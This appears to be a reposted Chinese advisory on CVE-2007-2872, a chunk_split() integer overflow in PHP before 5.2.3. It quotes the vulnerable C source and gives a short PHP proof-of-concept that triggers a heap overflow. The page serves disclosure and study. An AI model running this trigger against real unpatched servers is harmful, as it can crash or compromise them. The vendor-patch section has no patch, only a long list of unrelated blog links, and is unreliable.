当前位置：首页 > news >正文

PHP5.2下chunk_split()函数整数溢出漏洞分析

news 2026/6/5 14:36:59

受影响系统：
PHP PHP < 5.2.3
不受影响系统：
PHP PHP 5.2.3
描述：
--------------------------------------------------------------------------------
BUGTRAQ ID: 24261
CVE(CAN) ID: CVE-2007-2872

PHP是一种流行的WEB服务器端编程语言。

PHP中的chunk_split函数在处理畸形参数时存在整数溢出漏洞，本地攻击者可能利用此漏洞提升自己的权限。

PHP中chunk_split函数的1963行试图为函数结果分配充分的内存大小，但没有执行任何检查便使用了srclen和chunklen参数块。如果值的块和endlen大于65534字节的话，就会触发整数溢出，分配错误的内存大小，导致堆溢出。

ext/standard/string.c：

1953 static char *php_chunk_split(char *src, int srclen, char *end,
int endlen, int chunklen, int *destlen)
1954 {
1955 char *dest;
1956 char *p, *q;
1957 int chunks; /* complete chunks! */
1958 int restlen;
1959
1960 chunks = srclen / chunklen;
1961 restlen = srclen - chunks * chunklen; /* srclen % chunklen */
1962
1963 dest = safe_emalloc((srclen + (chunks + 1) * endlen + 1),
sizeof(char), 0);
1964
1965 for (p = src, q = dest; p < (src + srclen - chunklen + 1); ) {
1966 memcpy(q, p, chunklen);
1967 q += chunklen;
1968 memcpy(q, end, endlen);
1969 q += endlen;
1970 p += chunklen;
1971 }

<*来源：Gerhard Wagner

*>

测试方法：
--------------------------------------------------------------------------------

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<?
$a=str_repeat("A", 65535);
$b=1;
$c=str_repeat("A", 65535);
chunk_split($a,$b,$c);
?>

建议：
--------------------------------------------------------------------------------
厂商补丁：

PHP
---

my.oschina.net/u/3794224/blog/19550464
my.oschina.net/u/3427593/blog/19550463
my.oschina.net/u/3794224/blog/19550452
my.oschina.net/u/3427593/blog/19550451
my.oschina.net/u/3794224/blog/19550438
my.oschina.net/u/3427593/blog/19550436
my.oschina.net/u/3794224/blog/19550424
my.oschina.net/u/3427593/blog/19550423
my.oschina.net/u/3794224/blog/19550412
my.oschina.net/u/3427593/blog/19550409
my.oschina.net/u/3794224/blog/19550397
my.oschina.net/u/3427593/blog/19550396
my.oschina.net/u/3794224/blog/19550383
my.oschina.net/u/3427593/blog/19550381
my.oschina.net/u/3794224/blog/19550368
my.oschina.net/u/3427593/blog/19550366
my.oschina.net/u/3794224/blog/19550356
my.oschina.net/u/3427593/blog/19550352
my.oschina.net/u/3794224/blog/19550342
my.oschina.net/u/3427593/blog/19550341
my.oschina.net/u/3794224/blog/19550327
my.oschina.net/u/3427593/blog/19550326
my.oschina.net/u/3794224/blog/19550311
my.oschina.net/u/3427593/blog/19550309
my.oschina.net/u/3794224/blog/19550297
my.oschina.net/u/3427593/blog/19550294
my.oschina.net/u/3794224/blog/19550283
my.oschina.net/u/3794224/blog/19550268
my.oschina.net/u/3427593/blog/19550265
my.oschina.net/u/3794224/blog/19550256
my.oschina.net/u/3427593/blog/19550252
my.oschina.net/u/3794224/blog/19550240
my.oschina.net/u/3427593/blog/19550239
my.oschina.net/u/3794224/blog/19550224
my.oschina.net/u/3427593/blog/19550222
my.oschina.net/u/3794224/blog/19550210
my.oschina.net/u/3427593/blog/19550206
my.oschina.net/u/3794224/blog/19550198
my.oschina.net/u/3427593/blog/19550193
my.oschina.net/u/3794224/blog/19550184
my.oschina.net/u/3427593/blog/19550180
my.oschina.net/u/3794224/blog/19550170
my.oschina.net/u/3427593/blog/19550166
my.oschina.net/u/3794224/blog/19550153
my.oschina.net/u/3427593/blog/19550151
my.oschina.net/u/3794224/blog/19550139
my.oschina.net/u/3427593/blog/19550135
my.oschina.net/u/3794224/blog/19550128
my.oschina.net/u/3427593/blog/19550121
my.oschina.net/u/3794224/blog/19550113
my.oschina.net/u/3427593/blog/19550110
my.oschina.net/u/3794224/blog/19550098
my.oschina.net/u/3427593/blog/19550095
my.oschina.net/u/3794224/blog/19550083
my.oschina.net/u/3427593/blog/19550080
my.oschina.net/u/3794224/blog/19550068
my.oschina.net/u/3427593/blog/19550065
my.oschina.net/u/3794224/blog/19550055
my.oschina.net/u/3427593/blog/19550050
my.oschina.net/u/3794224/blog/19550043
my.oschina.net/u/3427593/blog/19550037
my.oschina.net/u/3794224/blog/19550026
my.oschina.net/u/3427593/blog/19550024
my.oschina.net/u/3794224/blog/19550012
my.oschina.net/u/3427593/blog/19550007
my.oschina.net/u/3794224/blog/19549998
my.oschina.net/u/3427593/blog/19549994
my.oschina.net/u/3794224/blog/19549982
my.oschina.net/u/3427593/blog/19549979
my.oschina.net/u/3794224/blog/19549970
my.oschina.net/u/3427593/blog/19549964
my.oschina.net/u/3794224/blog/19549955
my.oschina.net/u/3427593/blog/19549951
my.oschina.net/u/3794224/blog/19549940
my.oschina.net/u/3427593/blog/19549936
my.oschina.net/u/3794224/blog/19549927
my.oschina.net/u/3427593/blog/19549922
my.oschina.net/u/3427593/blog/19549909
my.oschina.net/u/3794224/blog/19549894
my.oschina.net/u/3427593/blog/19549892
my.oschina.net/u/3794224/blog/19549879
my.oschina.net/u/3427593/blog/19549878
my.oschina.net/u/3427593/blog/19549865
my.oschina.net/u/3794224/blog/19549864
my.oschina.net/u/3427593/blog/19549851
my.oschina.net/u/3794224/blog/19549852
my.oschina.net/u/3427593/blog/19549836
my.oschina.net/u/3794224/blog/19549835
my.oschina.net/u/3427593/blog/19549824
my.oschina.net/u/3794224/blog/19549823
my.oschina.net/u/3794224/blog/19549808
my.oschina.net/u/3427593/blog/19549807
my.oschina.net/u/3427593/blog/19549794
my.oschina.net/u/3794224/blog/19549793
my.oschina.net/u/3427593/blog/19549780
my.oschina.net/u/3794224/blog/19549779
my.oschina.net/u/3794224/blog/19549766
my.oschina.net/u/3427593/blog/19549765
my.oschina.net/u/3794224/blog/19549752
my.oschina.net/u/3427593/blog/19549751
my.oschina.net/u/3794224/blog/19549736
my.oschina.net/u/3427593/blog/19549735
my.oschina.net/u/3427593/blog/19549724
my.oschina.net/u/3794224/blog/19549723
my.oschina.net/u/3794224/blog/19549712
my.oschina.net/u/3427593/blog/19549711
my.oschina.net/u/3794224/blog/19549696
my.oschina.net/u/3427593/blog/19549695
my.oschina.net/u/3794224/blog/19549681
my.oschina.net/u/3427593/blog/19549680
my.oschina.net/u/3794224/blog/19549667
my.oschina.net/u/3427593/blog/19549666
my.oschina.net/u/3794224/blog/19549652
my.oschina.net/u/3427593/blog/19549651
my.oschina.net/u/3427593/blog/19549641
my.oschina.net/u/3794224/blog/19549640
my.oschina.net/u/3794224/blog/19549624
my.oschina.net/u/3427593/blog/19549623
my.oschina.net/u/3427593/blog/19549610
my.oschina.net/u/3794224/blog/19549609
my.oschina.net/u/3794224/blog/19549594
my.oschina.net/u/3427593/blog/19549593
my.oschina.net/u/3794224/blog/19549578
my.oschina.net/u/3427593/blog/19549577
my.oschina.net/u/3794224/blog/19549568
my.oschina.net/u/3427593/blog/19549567
my.oschina.net/u/3427593/blog/19549551
my.oschina.net/u/3794224/blog/19549550
my.oschina.net/u/3794224/blog/19549536
my.oschina.net/u/3427593/blog/19549537
my.oschina.net/u/3794224/blog/19549524
my.oschina.net/u/3427593/blog/19549523
my.oschina.net/u/3427593/blog/19549507
my.oschina.net/u/3794224/blog/19549506
my.oschina.net/u/3427593/blog/19549493
my.oschina.net/u/3794224/blog/19549492
my.oschina.net/u/3427593/blog/19549480
my.oschina.net/u/3794224/blog/19549479
my.oschina.net/u/3427593/blog/19549466
my.oschina.net/u/3794224/blog/19549465
my.oschina.net/u/3794224/blog/19549453
my.oschina.net/u/3427593/blog/19549452
my.oschina.net/u/3427593/blog/19549437
my.oschina.net/u/3794224/blog/19549436
my.oschina.net/u/3427593/blog/19549422
my.oschina.net/u/3794224/blog/19549421
my.oschina.net/u/3427593/blog/19549407
my.oschina.net/u/3794224/blog/19549406
my.oschina.net/u/3427593/blog/19549394
my.oschina.net/u/3794224/blog/19549395
my.oschina.net/u/3427593/blog/19549382
my.oschina.net/u/3794224/blog/19549381
my.oschina.net/u/3427593/blog/19549367
my.oschina.net/u/3794224/blog/19549366
my.oschina.net/u/3794224/blog/19549354
my.oschina.net/u/3427593/blog/19549353
my.oschina.net/u/3794224/blog/19549338